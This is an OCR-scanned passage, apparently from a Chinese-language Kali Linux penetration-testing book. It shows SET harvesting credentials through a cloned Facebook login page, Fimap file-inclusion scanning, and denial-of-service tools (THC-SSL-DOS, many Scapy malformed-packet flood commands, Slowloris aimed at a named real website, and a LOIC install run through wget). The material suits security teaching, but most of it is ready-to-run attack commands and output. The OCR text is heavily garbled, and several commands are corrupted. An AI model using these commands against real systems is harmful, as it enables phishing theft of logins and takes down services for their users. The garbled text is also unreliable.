The Facebook Team 


Facebook will never ask you for your password in an email or Facebook message. Learn more about 
how to keep your account secure. 


当 我 们 在 仿冒 的 Facebook 网 站 上 输入 用 户 名 时 ，SET 会 截获 这 部 分 网 络 数据 。SET 依 然 会 将 
用 户 重 定 问 到 真实 网 站 。 攻 击 成 功 的 希望 在 于 受害 者 在 被 重 定 问 到 真实 的 Facebook 时 ,他 们 以 为 
输入 了 错误 的 密码 而 继续 使 用 Facebook， 而 不 知道 SET 已 经 截获 了 他 们 的 登录 凭据 : 


root@kali: ~ 


File Edit View Search Terminal Help 


Cloning the website: http: 
This could take a little bi 


1 t | | t | | | W . 
BP, Jun/ 2013 22: 18: "GET / HTTP/1.1" 200 - 
1/Jun/2013 22:18:29] "GET / HTTP/1.1" 206 = 
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前 面 的 例子 显示 出 SET 已 经 抓 到 了 我 们 的 用 户 名 DrChaos， 密 人 码 是 ILoveKali。 


在 完成 这 个 练习 时 ， 按 下 Ctrl+C 退 出 SET 工具 ， 它 会 生成 一 个 HIML 报 告 。SET 创 建 了 一 份 
专业 报告 ， 可 用 于 你 的 渗透 测试 报告 中 : 


Welcome to the Social-Engineer Toolkit Report Generation Tool. This report should contain information obtained during a 
successful phishing attack and provide you with the website and all of the parameters that were harvested. Please remember 
that SET is open-source, free, and available to the information security community. Use this tool for good, not evil. 


6.6 Fimap 


， a 
ow) CEO PGi (henson 


Fimap 是 一 于 Python 工 具 ， 用 于 目 动 查找 、 准 备 、 审 计 、 利 用 和 用 谷歌 搜索 Web 应 用 中 的 本 
地 和 远程 文件 包含 (LFDRIRFI) Bug. 


Fimap 可 以 在 Web Applications > Web Vulnerability Scanners > Fimap 中 找到 。 在 你 打开 
Fimap 时 ， 它 会 打开 一 个 终端 窗口 ， 显 示 主 屏幕 。Fimap 有 一 些 插件 选项 ,你 可 以 通过 如 下 命令 下 
BNET : 

fimap --install -plugins 


所 有 可 用 持 件 都 会 显示 到 一 个 列表 中 , FR SSN PEER GEIB h o 在 下 面 的 例 
子 中 ， 有 两 个 可 供 安 疲 的 插件 。 你 需要 运行 两 次 安 滤 命令 来 分 别 安 窑 各 个 插件 : 
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:~# fimap --install-plugins 
fimap v.09 (For the Swarm) 
:: Automatic LFI/RFI scanner and exploiter 
:: by Iman Karim (fimap.dev@gmail .com) 


Requesting list of plugins... 
3ETETETETETETETETETETETETETETETETETETETETETRETETEM 3ETETETETETETETETETETETETETETETETETETETETETETETRETETEETETER3ETETETETETERETETERETERETETET TETETEHEIEIEIERER E 
THHEHEHHEHEHEEEIHEHEEHHIBHEHEHHHEEE BHAA RSS 
#LIST OF TRUSTED PLUGINS 

# 
FG a 4 1/41 4 
BIESHUTHESBSSISSHTHETESHITBEIHEISSSESE 
#[1] Weevils injector by Darren "“Infodox" Martyn <infodox@insecurety.net> - At v 
ersion 2 not installed. E 
i[2] AES HTTP reverse shell by Darren "Infodox" Martyn <infodox@insecurety.net> 
- At version 1 not installed. E 
i[q] Cancel and Quit. 

E 
JETEHETEHETEHIETETHIETEREIETHIHIERHIE TIENE TETEEHEIETETESHETERHIETEIEIE TEE HIEHIETHEHEMERETEEHIETRIENETEHIETETEEHEIETEEHIETHIERETHEHIBIHHHHHEEHE E 
THHEHEHHEHHHEHEIBHEHHHBHEHHHEHEHEE EH EE RBS 
Choose a plugin to install: 


"ZO HjFimap, ECS 2H wise URL HE PRAY Hits. TRAEURLISEEL RSA SIEM, UK 
可 以 指定 一 个 URL， 或 是 用 谷歌 来 获取 一 系列 URL， 或 是 从 其 他 URL 中 提取 URL 等 方法 。 它 如 何 
处 理 表单 和 首部 也 会 有 多 种 选项 。 在 下 面 的 例子 中 ， 我 们 会 指 癌 www.thesecuritybloggercom。 


要 扫描 thesecurityblogger.com 网 站 ， 输 入 如 下 命令 : 


fimap -u 'http://wwwthesecurityblogger.com' 


Fimap 会 试图 找 出 所 有 的 文件 包含 独 洞 。 下 面 的 例子 显示 的 是 我 们 的 目标 上 没有 发 现 可 用 于 
文件 包含 攻击 的 漏洞 : 


:~# fimap --force-run -u "http://www.thesecurityblogger.com/?p-22475" 
fimap v.09 (For the Swarm) 
:: Automatic LFI/RFI scanner and exploiter 
>: by Iman Karim ( fimap.dev@gmail .com) 


SingleScan is testing URL: 'http://www.thesecurityblogger.com/?p-22475' 
[23:19:29] [OUT] Inspecting URL 'http://www.thesecurityblogger.com/?pz2475' ... 
[23:19:29] [INFO] Fiddling around with URL... 
Target URL sE affected by any file inclusion bug :( 

i~# 
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通常 渗透 测试 联系 都 会 侧重 找 出 安全 中 的 空 际 , 而 不 是 危害 某 个 系统 。 这 是 区 分 真实 攻击 者 
和 经 过 授权 的 渗透 测试 人 员 的 一 项 重要 功能 。 真 实 的 黑客 不 会 遵循 这 些 规 则 , 也 不 会 关心 是 否 会 
中 新 别 人 的 业务 ， 只 要 攻击 有 助 于 提升 他 们 。 有 些 情况 中 ,黑客 希 望 对 目标 造成 任何 形式 的 负面 
影响 ， 包 括 摘 震 关键 的 系统 。 出 于 这 点 ， 有 些 情 况 中 ， 对 系统 进行 测试 、 判 定 系 统 钙 拒 绝 服务 攻 
ik (DoS, Denial of Service ) 的 风险 很 有 必要 。 这 种 测试 通常 会 称 为 对 连接 到 因特网 的 服务 的 压 
力 测试 。 
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i 
LS 能 会 在 渗透 测试 结束 后 对 系统 造成 负面 影响 。 我 们 建议 可 能 的 话 , 你 尽量 对 宛 余 
Z 


. 对 某 项 资产 进行 测试 、 找 出 DoS 漏 洞 时 ， 务 必要 拿 到 批准 。 有 些 攻击 方法 可 
系统 、 实 验 设 备 或 是 非 生产 系统 进行 测试 。 


最 第 见 的 DoS 攻 击 部 会 包含 用 和 额外 通信 请 求 来 形成 流 加 目标 的 洪水 。 这些 过 载 会 叶 致 资源 无 
法 啊 应 合理 网 络 请 求 ， 或 是 显著 地 降低 啊 应 速度 ， 以 至 于 几 近 不 可 用 。DoS 攻 击 可 以 针对 系统 资 
源 〈 即 便 盘 空间 、 市 宽 等 ) 配置 信息 〈 即 删除 路 由 表 等 入 状态 信息 〈TCP 会 话 重 置 ) 或 是 能 危 
害 系统 运行 的 所 有 操作 。 


区 别 在 于 DogS 攻 击 只 涉及 一 台 机 器 ,而 DDoS 攻击 涉及 多 台 。DDoS 超 出 了 这 里 的 
讨论 范围 。 


| M Dos 跟 分 布 式 拒绝 服务 攻击 (DDoS, Distributed Denial of Service ) 之 间 的 


有 四 类 主要 的 DoS/DDoS 攻 击 类 别 。 


口 基于 量 的 攻击 (Volume Based Attacks) ” 它 包括 UDP 洪 水 、ICMP 洪 水 和 其 他 基于 欺骗 
数据 包 的 洪水 ， 其 目的 在 于 耗 尽 受害 者 站 点 的 市 宫 。 

O HMM (Protocol Attacks) ，” 它 会 消耗 服务 融 的 资源 或 是 中 间 通 信 设 备 ， 比 如 路 由 需 、 
防火 场 、 负 和 载 均 衔 硕 等 。 例 子 有 SYN 洪 水 (SYN Flood )、 和 死亡 之 Ping (Ping of Death ), 
Smurf 攻 击 ( 以 攻击 工具 名 命名 )、 泪 滴 攻 击 ( Teardrop Attack )、 数 据 包 碎片 攻击 
( Fragmented Packets ) 等 。 

a MARE (Application Layer Attacks) ” 它 会 利用 合法 网 络 数 据 来 使 Web 服 务 崩 演 ， 
例如 零 时 差 攻 击 〈 Zero Day Attack )、 漏 洞 利 用 等 。 

O 会 话 耗 尽 (Session Exhaustion) “通过 重复 建立 会 话 而 不 关闭 新 会 话 来 通 近 会 话 上 限 ， 
目的 是 消耗 资源 。 

Kali Linux 包 含 多 个 可 用 于 应 用 层 DoS 攻 击 的 漏洞 利用 工具 ， 在 前 面 草 节 中 都 介绍 过 ， 比 如 


Metasploit. WA, 在 第 3 草 中 我 们 介 绍 过 一 个 流行 的 DoS 协 议 攻击 工具 Scapy。 这 里 有 一 些 其 他 执 
行 DoS 攻 击 的 Kali Linux A w LE., 


| Q 为 了 测试 DoS 攻 击 ， 你 可 以 用 www.upordown.org 来 查看 某 个 网 站 是 否 可 用 。 


UporDown 


down for everyone or just me? 


E 
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6.7.1 THC-SSL-DOS 


安全 套 接 层 (SSL, Secure Socket Layer ) 协 议 用 于 保护 因特网 上 的 连接 和 交易 。 建立 安全 SSL 
连接 时 服务 帮 并 的 处 理 能 力 要 比 客 户 并 大 15 倍 才 行 。THC-SSL-DOS 就 是 利用 这 种 不 对 称 属 性 来 
对 服务 需 造 成 过 载 ， 直 到 其 拒绝 为 合法 用 户 提 供 任 何 服务 。 这 种 攻击 利用 SSL 的 安全 重新 协商 
( Secure Re-negotiation ) 功能 来 通过 单个 TCP 连 接触 发 数 以 千 计 的 重新 协商 过 程 。 它 称 作 SSL 耗 尽 
攻击 ( SSL-Exhaustion Attack )。 这 种 方法 的 优势 在 于 客户 端 对 SSL 握 手 的 处 理 能 力 遥 遥 领 乞 ， 也 
网 是 说 通过 普通 网 络 连接 的 一 台 普 通 笔记 本 电脑 可 以 摘 震 一 个 Web 应 用 服务 硕 。 这 是 一 个 已 知 漏 
洞 ， 并 且 在 写作 本 书 时 尚未 出 现 有 歼 的 解决 方案 。 


要 访问 THC-SSL-DOS， 浏 览 至 Stress Testing > Web Stress Testing > the-ssl-dos。 它 会 弹出 一 
个 终 冰 窗 口 ， 并 显示 THC-SSL-DOS 的 主页 。 要 针对 某 个 目标 运行 THC-SSL-DOS， 输 入 : 


thc-ssl-dos [选项 ] < 受害 者 ip 地 址 > «350» and --accept 


你 必须 在 命令 中 带 上 --accept， 否 则 会 得 到 如 下 的 错误 消息 : 


CaN ERROR: 
| Please agree by using '--accept-—option-that-the IP 4s-a-legitimate target 


and that you are fully authorized to perform the test against this target. 
L2 | 


THC-SSL-DOSi277 EIA, WKAR 0S CIR. ZEA ETE SPE A A 
握手 过 程 。 在 下 面 的 第 一 个 蕉 图 中 ， 我 们 会 展示 一 个 没有 部 闭 SSL 的 网 站 ， 因 此 它 会 显示 连接 错 
误 。 第 二 个 截图 中 显示 了 握手 成 功 ， 最 终 它 会 对 目标 进行 拒绝 服务 攻击 。 切 记 ,， 你 只 能 对 有 权限 
测试 的 下 地 址 或 站 点 进行 答 试 。 这 些 攻 击 可 以 对 网 站 或 Web 应 用 造成 严重 的 破坏 : 


:~ 并 the-ssl-dos 50.8/.145.132 --accept 


Twitter @hackerschoice 


Greetingz: the french underground 


Waiting for script kiddies to piss off 
The force is with those who read the source... 


Handshakes © [0.00 h/s], 1 Conn, B Err 

Handshakes © [0.00 h/s], 3 Conn, © Err 

SSL: erroar:140770FC:SSL routines+SSL23- GET SERVER-HELHLO-unknown protocol 
#10: This does not look like SSL! 
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Waiting for script kiddies to piss off 

“he force is with those who read the source. 
Handshak a [0.00 h/s], 1 Conn, © Err 
Handshakes 13 [66.49 h/s], 10 Conn, © Err 
wsl. 19 Conn, O Err 
Ea Como Err 


Handshakes | 
Handshakes 357 e()76, Pys] 

Handshakes 543 [185.76 h/s],- 44 Conn, O Err 

Handshakes 698 [155.41 h/s], 51 Conn, © Err 

Handshakes 842 [144.06 h/s], 58 Conn, O Err 

Handshakes 987 [144.99 hs], 64 Conn, O Err 

Handshakes 1138 [151.00 h/s], 69 Conn, © Err 
Handshakes 1296 [157.78 hs], 73 Conn, © Err 


6.7.2 Scapy 


Scapy 是 最 流行 的 拒绝 服务 攻击 工具 之 一 。Scapy 是 一 个 计算 机 网 络 数 据 包 伪造 工具 ， 由 
Philippe Biondi 用 Python 开 发 。Scapy 可 以 伪造 或 破译 数据 包 、 将 它们 发 送出 去 、 抓 取 数 据 包 ， 并 
将 请 求 和 应 答 匹 配 起 来 。 除 此 之 外 ， 它 还 能 完成 其 他 任务 ， 比 如 扫描 、 跟 踩 路由、 探测、 单元 检 
测 、 攻 击 和 网 络 探索 。 


一 种 稼 见 的 方法 是 在 Kali 中 算 改 TCP 数 据 包 后 将 其 通过 S$Scapy 发 送出 去 。 我 们 可 以 在 终端 窗口 
中 输入 scapy 来 启动 Scapy。 一 旦 Scapy 运 行 起 来 ， 你 就 可 以 输入 命令 语法 了 : 


i~# scapy 
INFO: Can't import python gnuplot wrapper . Won't be able to plot. 


WARNING: No route found for IPv6 destination :: (no default route?) 
Welcome to Scapy (2.2.0) 
>>> 


在 下 面 的 玲 图 中 ， 我 们 会 用 Scapy 来 加 测试 服务 从 发 送 格式 有 误 的 TCP 数 据 包 。 在 这 个 用 例 
中 , 测试 服务 从 的 耳 地 址 为 10.0.0.1。 它 可 能 是 一 人 台 路 由 融 或 是 一 个 web 服务 肯 。 此 外 ,我 们 还 要 
制定 发 送 到 目的 地 的 数据 包 数 目 。 在 这 个 例子 中 ， 我 们 想 通 过 这 条 命令 发 送 2000 个 数据 包 : 


send (IP(dst="10.0.0.1",tt1l=0) /TCP(),iface="eth0", count=2000) 


在 前 面 的 命令 行 中 , 我 们 通过 Kali 服 务 天 上 的 etho 网 卡 同 目的 地 地 址 10.0.0.1 发 送 了 2000 
个 数据 包 。 此 外 ， 我 们 给 目标 发 送 了 值 为 0 的 生存 周期 。 从 TCP 协 议 的 角度 看 ， 这 个 值 基 本 是 不 
可 能 的 。 不 过 这 里 我 们 就 是 要 符 试 用 错误 的 TTL 值 来 迷惑 Web 服 务 硕 。 现 实 中 ， 攻 击 者 会 发 送 数 
以 百 万 计 的 这 种 数据 包 。 这 里 大 家 需要 注意 , 状况 展 好 的 系统 也 有 可 能 会 因 一 个 损坏 的 或 是 格式 
有 误 的 数据 包 而 骨 汝 或 出 错 。 我 们 可 以 调整 攻击 中 需要 用 到 的 数据 包 数 日 或 其 他 参数 : 


:~# scapy 
INFO: Can't import python gnuplot wrapper . Won't be able to plot. 
WARNING: No route found for IPv6 destination :: (no default route?) 


Welcome to Scapy (2.2.0) 
>>> send(IP(dst-'"10.0.0.1",tti120) /TCP(),iface-z"ethO",count-z2000) 
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下 面 是 Scapy 常 用 的 男 外 一 些 攻击 场景 。 
HIS AIP HAN 


send (IP(dst="10.0.0.1", srcz"10.20.30.40", version=0)/ 
TCP (dport="www"), iface="eth0O", count=2000) 


音 误 的 TCP 校 验 和 


send (IP(dst="10.0.0.1") /TCP(chksum=0x5555),iface="eth0O", count=2000) 


普 误 的 TCP 标 记 (所 有 标记 位 都 清 零 了 并 且 sEQ# == o) 


send(IP(dst="10.0.0.1")/TCP(flags="",seq=555),iface="eth0O", 
count=2000) 


音 误 的 TCP 标 记 《“ 所 有 标记 位 都 置 位 了 ) 

send (IP(dst="10.0.0.1")/TCP(flags=0x0ff),iface="eth0",count=2000) 
只 置 位 FIN 

send (IP(dst="10.0.0.1")/TCP(flags="F"),iface="eth0",count=2000) 
首部 长 度 > L2 长 度 


send(IP(dstz"10.0.0.1", srcz"10.20.30.40", ihl=15L) /TCP(dport="www"), 
iface="eth0O", count=2000) 


首部 长 度 过 短 


send(IP(dstz"10.0.0.1", srcz"10.20.30.40", ihl=2L) /TCP(dport="www"), 
iface="eth0O", count=2000) 


ICMP 347k 
send (IP(dst="10.0.0.1") /ICMP(),iface="eth0", count=2000) 
IP 错 误 校 验 和 


send(IP(dst="10.0.0.1", src="10.20.30.40", chksum=0x5500) /TCP(dport="www"), 
iface="eth0", count=2000) 


IP 分 片 


send(IP(dst="10.0.0.1", srczs"10.20.30.40", frag=1) /TCP(dport="www"), 
iface="eth0O", count=2000) 


IPKE > LKE 


send(IP(dst="10.0.0.1", srcz"10.20.30.40", ihl=5L, len=80)/TCP(dport="www"), 
ifacez"eth0", count=2000) 
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IP 源 地 址 == 目标 地 址 


send(IP(dst="10.0.0.1", srcz"10.0.0.1")/TCP(dports2"www"), 
iface="eth0O", count=2000) 


L-KE >> IPKE 


send (IP(dst="10.0.0.1",len=32) /Raw(load="bla-bla-bla-bla-bla-bla-bla-bla"), 
iface="eth0",count=2000) 

send (IP(dst="10.0.0.1", len=32) /UDP(dport=80, len=48) /Raw(load= 
"bla-bla-bla-bla-bla-bla-bla-bla") ,iface="eth0", count=2000) 

send (IP(dst="10.0.0.1",len=32) /ICMP() /Raw(load="bla-bla-bla-bla- 
bla-bla-bla-bla") ,iface="eth0",count=2000) 


没有 L4 

send (IP(dst="10.0.0.1", srcz"10.20.30.40"), iface="eth0", count=2000) 
SYN 和 FIN 置 位 

send (IP(dst="10.0.0.1")/TCP(flags="FS"),iface="eth0",count=2000) 
TCP 首 部 长 度 > L2 长 度 


send(IP(dst="10.0.0.1", srcz"10.20.30.40")/ 
TCP (dport="www", dataofs=15L), iface="eth0", count=2000) 


TCP 首 部 长 度 过 短 (KÆ <5) 


send(IP(dst="10.0.0.1", src="10.20.30.40")/ 
TCP (dport="www", dataofs=1L), iface="eth0", count=2000) 


6.7.3 Slowloris 


Slowloris HTTP DoS 


SOOCOOOREOODCOCOOE f f! BcocoaoooOB E BÉ EB GE ne . r ccooccoOOOE BÉ B BOO 
CCCOOOOQERÉEOOCCOQOQOÉ [! BÉ BCOCCOOOCOOBÉEEBODSZ:IT...r rcoODOÉEBBEEBORÉEOOOS rcocoocCCCOOOQQOÉ BO 
CCCOOBÉEBEDOCOOEI |! BEBCCCC:::cODOÉBÉBOC x ox sO eee ORC) 
,IDOOCOCOE E E 

OOOQOOBÉBPEPÉBBBBEEBÉEOO:. . ss sOUBEROr, . EO ono occ 
CooOEÉBEPBEEBEBEBEBÉEBBOO:. sOBEBEC : z " xo a 
COCDOOOBEEEEBOBEREEBRBEOD. .oBDoO. .cOBBOD: la oo fs Cec OC 
rtoOBOC. . Ea x Eee IO 

LI ICOOODOOOC 


E ICHXWHOWOEE! 
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Slowloris 是 一 球 可 用 于 DoS 攻 击 的 低 带 完 HTTP 客 户 绒 。 Slowloris 的 独特 之 处 在 于 它 攻 击 目标 
时 采用 的 并 非 是 常用 的 洪水 技术 。Slowloris 通 过 发 送 部 分 (不 完整 ) HTTP 请 求 来 保持 连接 处 于 
打开 状态 。 它 会 每 阳 一 定 间隔 就 发 送 数 百 个 后 续 分 片 的 涉 ， 以 保持 连接 不 被 关闭 。 这 种 做 法 会 逐 
渐 否 哈 挥 目标 上 的 可 用 资源 , 使 其 无 法 啊 应 合法 请 求 。 高 流量 网 站 可 能 要 花费 很 长 时 间 才 能 释放 
出 可 用 的 套 接 字 。 在 Slowloris 可 以 使 用 这 些 套 接 字 之 前 ， 其 他 用 户 必 须 先 完成 他 们 的 请 求 。 尽 管 
如 此 ，Slowloris 最 终 依然 会 消耗 尽 所 有 可 用 的 套 接 字 ， 摘 震 受 害 者 网 站 的 服务 。 


Slowloris 针 对 的 是 采用 线程 化 运算 方式 的 服务 器， 也 就 是 说 它 可 以 限制 运行 的 线程 的 数目 。 
这 类 服务 郁 包 括 Apache 1.x、Apache 2.x、dhttpd、GoAhead 等 。 


Slowloris 并 未 在 Kali Linux PRUE, PRAT VA Mhttp://ckers.org/slowloris F ZXSlowloris. 


要 运行 Slowloris， 下 载 该 .p] 脚 本 ， 并 打开 一 个 命令 行 终端 。 切 换 至 该 脚本 所 在 目录 ， 输 入 : 
perl slowloris.pl 


它 会 调 起 主 界面 。 要 针对 某 个 目标 运行 Slowloris， 输 入 同样 的 命令 ， 后 跟 -dns 和 目标 。 举 
个 例子 ， 要 攻击 www.thesecurityblogger.com， 输 入 : 


perl slowloris.pl -dns thesecurityblogger.com 


CCCOOBBBBSSODCOO08GQ08880Ccc : : :cCOQ08880c ..... 

QO00008SSSS000088880800c:.:...c008088c. . .co0008880000CoooooccoCODODDDCODDO 
Jc ..c0888Ü0c.. SOOOOO00000CCoocooCoCoCO0000000 

COD0S88(1888888888880o:. .08888C:  .oC0o. 

CCCCOO888888088888800. .o800. .cOBB800: : 

coooCCcOBQ88008088800:::... .. icOBOc. . M à " 

‘ccooooCOSS8s0000800c..:...::. .cob@BCor::.. aaa 7. Te Tel Me yecece:::iccooCCool 

..CoCOBQBO0DCCOC:... ....: frtririis:tcooooo00 


二 
-COD0000 


a a ed LR hs a 


Tee BS | M MB B BL Meal olo] ufo o] E 


Usage: 


perl slowloris.pl -dns [www.example.com] -opt-ons 


Type 'perldoc slowlaris.pl' for help with opt-ons. 


:-/Desktop£ perl slowloris.pl -dñs thesecuritybtogger-coml 


你 会 看 到 Slowloris 用 掉 了 可 用 的 僚 接 子 ， RAK HEBES: 
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Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client 
Defaulting to port 80. 

Defaulting to a 5 second tcp connection timeout. 

Defaulting to a 100 second re-try timeout. 

Defaulting to 1000 connections. 

Multithreading enabled. 

Connecting to thesecurityblogger.com:80 every 100 seconds with 1000 sockets: 


Building sockets. 
Building sockets. 
Building sockets. 
Building sockets. 
Building sockets. 
Building sockets. 
Building sockets. 
Building sockets. 
Building sockets. 
Building Se Kat 


GS DoS 示 例 攻 击 我 们 选 了 www.thesecurityblogger.com。 但 在 实际 操作 中 ， 
要 用 这 个 站 点 来 做 党 试 。 


6.8 {KPues TAR (LOIC) 


低 轨道 离子 加 农 炮 ( LOIC, Low Orbit Ion Cannon ) 是 一 个 网 络 压力 o 也 就 是 说 ， 
设计 它 的 初衷 就 是 测试 目标 能 够 应 对 多 大 的 流量 ,以 便 计 划 未 来 的 资源 配置 。 这 个 工具 也 局 发 了 
类 似 的 软件 ， 如 JavaScript LOIC. ‘E MFH EIZE Webi w gr PETE JW x 


这 款 工 具 因 黑客 组 织 Anonymous 利 用 它 对 多 个 网 站 (包括 一 些 非 常 知名 的 公共 实体 ) 进行 
DDoS 攻击 而 广为人知 ， 有 些 法 律 观点 认为 LOIC 跟 对 网 站 进行 了 数 千 次 访问 没什么 差别 。 不 过 美 
国有 些 法 律 推 进 组 织 认 为 LOIC 的 使 用 违反 了 计算 机 安全 和 诈骗 法 和 案 。 


要 安装 LOIC， 打 开 一 个 终端 窗口 ， 输 入 : 


apt-get update 
aptitude install git-core monodevelop 
apt-get install mono-gmcs 


:~# aptitude install git-core monodevelop 
The following NEW packages will be installed: 
cli-common{a} git-core Libart-2.0-2{a} lLibart2.0-cil{a} Libbonoboui2-0{a} 
Libbonoboui2-common{a} libgconf2.0 cil{a) Libgdiplus{a} 
libglade2.0 cilf{a) libglade2.0-cil -dev{a} Libglib2.0-cil{a} 
libglib2.0-cil -dev{a} Libgnome-vfs2.0- -cilfa } libgnome2.24-cil{a} 


:~/Desktop/loic# apt-get install mono-gmcs 
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完成 上 述 操作 后 ,通过 cd ~/Desktop 命 令 切 换 到 桌面 日 录 ， 用 如 下 命令 创建 一 个 名 为 loic 
HY) Hox: 


mkdir loic 


:~/Desktop# pwd 
/ root/Desktop 


:~/Desktop# mkdir loic 


用 ca/1oic 命 令 切 换 进 该 日 录 ， 输入 如 下 命令 


wget https://raw.github.com/nicolargo/loicinstaller/ master/loic.sh 


:~/Desktop/Loic# wget https://raw.github.com/nicolargo/loicinstaller/ma 


"/loic E | 


下 一 步 ， 用 如 下 命令 修改 该 脚本 的 访问 权限 : 


chmod 777 loic.sh 


:~/Desktop/lLoic# chmod 777 Loic .sh 


最 后 一 步 是 通过 如 下 命令 运行 该 脚本 : 


./loic.sh install 


:~/Desktop/Loic# /loic .sh install 


运行 脚本 时 如 果 没 有 提示 任何 错误 信息 ， 那 么 你 就 可 以 更 新 loic 了。 你 可 以 用 如 下 命令 更 
新 : 


./loic/sh update 


File Edit View Search Terminal Help 
./loie.sh update 


mA, ， 你 可 以 启动 LOIC 了 。 可 以 用 如 下 命令 来 启动 : 


./loic.sh run 


:~/Desktop/Loic# ./loic.sh runi 
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Low Orbit lon Cannon | U dun goofed | v. 1.1.1.26 


Lock ori 


Lock on 


NONE! 


ICP | UDF message 
U dun gooted 


HTTP Subsite 


LOICHY HAIE f8] T8584 T o 你 可 以 选择 是 要 用 人 工 模式 还 是 IRC 模 式 。 我 们 会 在 后 面 这 个 例 
子 中 选择 人 工人 模式 。 


下 一 步 ， 你 可 以 选择 洪水 攻击 的 目标 URL 或 PP 地 址 。 在 下 面 的 例子 中 我 们 会 用 IP 地 址 
127.0.0.1。LOIC 提 供 了 一 些 攻击 选项 用 来 修改 TCP 或 UDP 的 设置 。 


在 准备 好 发 起 攻击 后 ， 点 击 IMMA CHARGIN MAH LAZER 按 钮 。LOIC 会 显示 攻击 正在 进 
行 中 。 点 击 Stop Flooding 按 钮 来 停止 攻击 : 


Pt server 
加 Manual Mode (Do pyoursei) (RC Mode (Hee B Dacennected 


L elec your target : -i Remy? 


REL gre | IMMA CHARGIN MAH LAZER | 


Deci tanget j 
| 


127.0.0.1 


=a Anek na 
TEP UG" massa 
U dun gocded 
LE 1 [- Speed EE E> 
HTTP Subsite 
į FF] 1) egi b | Wet Tor repy 
m Append random chars. bo dye mbia mea Fort Threads Timem E Usa Geo HIE) 
= mk Sram 


ki Connecung Fegesting Denwriomding Dessrdoaded Fequeqend 


tb comteweracrackeLOcy | 0 
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Kali Linux 提 供 了 许多 对 基于 Web 的 攻击 有 用 的 工具 。 这 里 会 介绍 Kali Linux 中 市 有 的 其 他 一 
些 本 划 中 尚未 做 介绍 的 工具 。 这 些 工 具 可 用 于 远程 渗透 测试 。 


6.9.1 DNSCheF 


version 0.1 | 


iphelix@thesprawl .orc 


DNSChefZé— KN E AMRA R RU EDT A ESE DNS {REE DNS ERE 
“伪造 DNS (Fake DNS Y’, 22 —ax AF iit PRA SH TA, RA AB (DNS, 
Domain Name System ) 是 针对 计算 机 、 服 务 、 或 任何 连接 到 因特网 或 私有 网 的 资源 的 分 布 式 命名 
系统 。 通 过 提供 伪造 DNS 地 址 ， 我 们 可 以 将 流量 重 定 回 到 其 他 需要 的 位 置 。 


举 个 例子 , 我 们 可 以 用 伪造 DNS 来 将 发 送 到 badguycom 的 请 求 指 回 一 人 台 本 地 机 和 带 ,终止 请 求 
或 是 进行 支持， 而 不 是 指 癌 位 于 因特网 上 其 他 位 置 的 真实 主机 。 要 让 这 种 方法 工作 起 来 , 你 需要 
能 百 接 访 问 和 修改 某 台 域名 服务 硕 上 的 DNS 记录 ,或 是 对 真实 的 DNS 记录 进行 投 毒 , 这 样 流量 最 
终 到 达 的 是 Kali Linux 服 务 人 各 。DNSChef 工 具 用 起 来 很 方便 。 不 过 ， 在 这 种 DNS 攻 击 方 法 中 ， 要 
将 流量 导向 Kali Linux 还 是 有 难度 的 。 


6.9.2 SniffJoke 


SniffJoke 会 对 你 的 TCP 连 接 进 行 透明 处 理 ， 并 能 在 传送 过 程 中 制造 延迟 场景 、 对 数据 包 进 行 
修改 ， 并 注入 伪造 的 数据 包 。 这 个 过 程 使 被 动 镭 听 技 术 如 IDS/IPS 或 咒 探 工具 很 难 正确 拦截 这 部 
分 流量 。 它 的 工作 原理 是 利用 嗅 探 工具 预定 应 该 记录 的 内 容 跟 客户 端 实 际 发 送 的 内 容 之 间 的 差 
T, 不 断 变 化 重组 数据 包 的 算法 来 绕 开 究 听 。 下面 的 两 个 框图 说 明了 穷 听 两 个 用 户 之 间 的 流量 时 
不 用 和 使 用 SniffJoke 的 情况 。 
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6.9.3 Siege 


Siege 是 一 款 为 Web 开 发 人 员 设 计 的 HTTP/HTTPS 压 力 测 试 工具 , 用 来 测量 高 压 情 况 下 他 们 代 
码 的 性 能 。Siege 提 供 了 多 线程 HTTP 负 载 测 试 和 基准 测试 功能 ， 它 会 根据 可 配置 的 并 发 和 模仿 用 
户 的 数目 来 对 Web 服 务 器 进行 测试 。Siege 有 回归 、 因 特 网 仿真 和 暴力 等 工作 模式 。 


你 可 以 在 Stress Testing > Network Stress Testing > Siege 下 面 找 到 : 


SIEGE 2.70 
Usage: siege [options] 
Siege [options] URL 
Siege -g URL 
Options: 
V, --version VERSION, prints the version number. 
, --help HELP, prints this section. 
Cc, -~-corfig CONFIGURATION, show the current config. 
v, --verbose VERBOSE, prints notification to screen. 
, --get GET, pull down HTTP headers and display the 
transaction. Great for application debugging. 
, --concurrent-zNUM CONCURRENT users, default is 10 
, ~-internet INTERNET user simulation, hits URLs randomly. 
, --benachmark BENCHMARK: no delays between requests. 
, --tinezNUMm TIMED testing where "m" is modifier S, M, or H 
ex: --time=lH, one hour test. 
, --reos-zNUM REPS, number of times to run the test. 


输入 如 下 命令 运行 Siege: 


siege [选项 ] < 目标 url> 
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PAYA) RJ ET XT www.thesecurityblogger.comia1TSiegel'] Tiii. SAIAHJRIP AES, 
如 截图 中 所 示 。 在 停止 Siege 测 试 时 ， 该 工具 会 提供 一 个 压力 测试 结果 报告 ， 如 下 所 示 : 


:=# siege www.thesecurityblogger.com 
** SIEGE 2.70 
** Preparing 1» concurrent users for battle. 
The server is now under siege... 


Lifting tre server siege... done. 
Transacticns: 

Availability: 100.00 % 
Elapsed time: 933.22 
Data transferred: 

Response time: 

Transacticn rate: 

Throughput : 0.06 MB/se 
Concurrency : 13.30 
Successful transactions: 171 
Failed transactions: © 
Longest transaction: 10.16 
Shortest transaction: 1.77 


FILE: /var/log/siege.log 

You can disable this annoying message! by editing 
the .siegerc file in your home-directory; change 
the directive 'show-logfile' to false. 


6.9.4 Inundator 


InundatorZé— 3X Zit A [55:1] At (IDS, Instrusion Detection System ) 和 入 侵 防 御 系 统 (IPS， 
Instrusion Prevention System ) 的 工具 ， 它 会 对 这 些 系统 的 日 志文 件 发 动 洪 水 攻击 。 具 体 原理 是 你 
先 对 目标 进行 一 些 假 阳 性 洪水 攻击 ， 这 样 你 就 能 够 从 啊 应 和 取证 的 角度 来 隐藏 真实 攻击 。 
Inundator 还 可 用 于 测试 安全 报告 工具 如 SIEM 和 IDSAPS 的 和 警报 系统 的 有 效 性 。 


6.9.5 TCPReplay 


TCPReplay Z FH Bi rii YR 21 AY LA libpeap f 3X f£ frá FY 230398 Vi HE M Xe 0X SFE HJ Pod 2 1t 6 o 
